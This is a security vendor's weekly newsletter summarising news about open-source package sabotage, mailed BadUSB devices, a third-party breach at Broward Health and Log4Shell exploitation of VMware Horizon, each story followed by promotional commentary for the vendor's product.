Open-Source Sabotage 💣 BadUSB Attacks 🔌 Broward Breach 🏥 & VMware Horizon Hacked 🧑💻
HUB Weekly Digest of Cyber Security
Hi dear readers. Welcome to the HUB Weekly Digest, where we cover cyber security top stories from the past week. This is the place for you to stay up to date not only on news stories, but also to get acquainted with best-practice and mitigations methods, as well as our cutting-edge cybersecurity technologies.
This week our stories are:
💣 The story of open-source sabotage is a supply-chain attack
🔌 The hazards of BadUSBs and how to protect yourself against them
🏥 IT consideration for healthcare institutions
🧑💻 UK’s NHS issues a warning on Log4j vulnerability in VMware Horizon
💣 I’m Tellin’ Y’all, It’s an Open-Source Sabotage
The story of the open-source engineer who went evil has been circulating on the internet for the past week. For whatever reason, this open-source developer has thought that it is a good idea to corrupt the lines of code that he wrote and that many people around the world use. The result was not pretty, with numerous apps having to be shut down (Sources: Bleeping Computer, Silicon Republic)
“The sabotaged versions cause applications to infinitely output strange letters and symbols, beginning with three lines of text that read ‘LIBERTY LIBERTY LIBERTY’.”
HUB’s perspective: As a matter of fact this is a classic supply chain attack. When using open-source, every update should go through sandboxing and testing, and only then get to be deployed into production. In addition, code review and application testing should be done. HUB security provides a mechanism to approve that the testing process has been completed successfully before allowing updates to critical environments.
🔌 BadUSBs: How Severe Is Such an Attack & Defense Methods
Hackers can intrude in various ways. A phishing campaign is just one possibility. Privileged access can also be obtained using more ‘analog’ techniques. Sending faulty USBs by mail is one such method that has acquired this title. Unbeknownst to the users, an innocent-looking envelope is delivered to them, purportedly by Amazon or another company. When the victim inserts the BadUSb into its computer, the attacker gains very broad access to resources, since he now has access to the device itself. (Source)
HUB’s perspective: Any USB attack starts with a user lack of awareness. All users in an organization should go through security awareness training and tests to make sure users are not falling to human-based attacks.
HUB Security prevents privileged users from doing anything they want. In addition, critical operations would require a second approver. This helps to reduce the risk of malware initiated by USB or other scams because the malware would not be able to run the unauthorized commands. The core concept behind this line of defense is to safeguard the most critical assets of the organization.
🏥 It’s a Hack via a 3rd-Party (and I’ll Cry If I Want To)
Another healthcare institution is making news as a result of data breaches. It’s Boward Health this time. One of its third-party medical providers, who had network access, was hacked. As a result, the personal information of around 1.3 million people was stolen. Date of birth, physical address, financial or bank information, Social Security number, insurance information and account number, medical information and history Condition, treatment, and so on were among the stolen data. (Source)
“Stolen data is often bartered privately in hidden dark web forums, so it could be too early to see signs of abuse in the wild”
HUB’s perspective: Healthcare is a prime target for attacks. Healthcare is lean on IT and therefore requires many third parties to help in daily administration and maintenance. Every thirds-party should be considered as an IT user, and therefore should implement appropriate controls. MFA or passwordless authentication is paramount.
HUB Security solution treats all users the same. If specific access wasn’t defined, it would not get into the critical application and data. In addition, all communications are authenticated and signed, assuring the authenticity of every operation. Therefore a hacker wouldn’t be able to access the system and data, even if he hacked into one of the third-party systems.
🧑💻 Hackers Find New Log4j Exploits — This Time it’s VMware
Hackers are actively targeting Log4J vulnerabilities, according to the UK’s National Health Service (NHS). An ‘unknown threat group’ is attempting to exploit a Log4j vulnerability in VMware Horizon servers to create web shells that might be used to distribute malware and ransomware, steal confidential information, and carry out other malicious actions. (Source)
“The attacks being warned against exploits the Log4Shell vulnerability in the Apache Tomcat service embedded within VMware Horizon…the attack uses the Lightweight Directory Access Protocol (LDAP) to execute a malicious Java file that injects a web shell into the VM Blast Secure Gateway service”
HUB’s perspective: This shows that even a clean desktop/client control (which is a good security practice) is not sufficient to protect applications and data. HUB Security protects your core applications and data without any way to bypass security controls.